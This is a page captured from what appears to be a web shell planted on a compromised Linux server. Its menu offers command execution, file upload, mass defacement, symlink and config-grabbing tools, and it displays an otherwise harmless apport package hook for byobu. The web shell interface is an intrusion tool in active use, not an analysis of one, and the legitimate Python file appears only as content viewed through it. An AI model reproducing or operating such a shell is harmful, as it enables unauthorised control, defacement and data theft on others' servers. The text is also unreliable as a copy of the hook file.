OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /libx32/../share/aclocal-1.16/../adduser/../apport/package-hooks/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
'''apport package hook for byobu (c) 2009 Canonical Ltd. Author: Dustin Kirkland <kirkland@byobu.org> ''' from apport.hookutils import * from os import path def add_info(report): attach_related_packages(report, ['byobu*', 'screen*']) report['Binaries'] = command_output(['sh', '-c', 'ls -alF /usr/bin/screen* /usr/bin/byobu*'])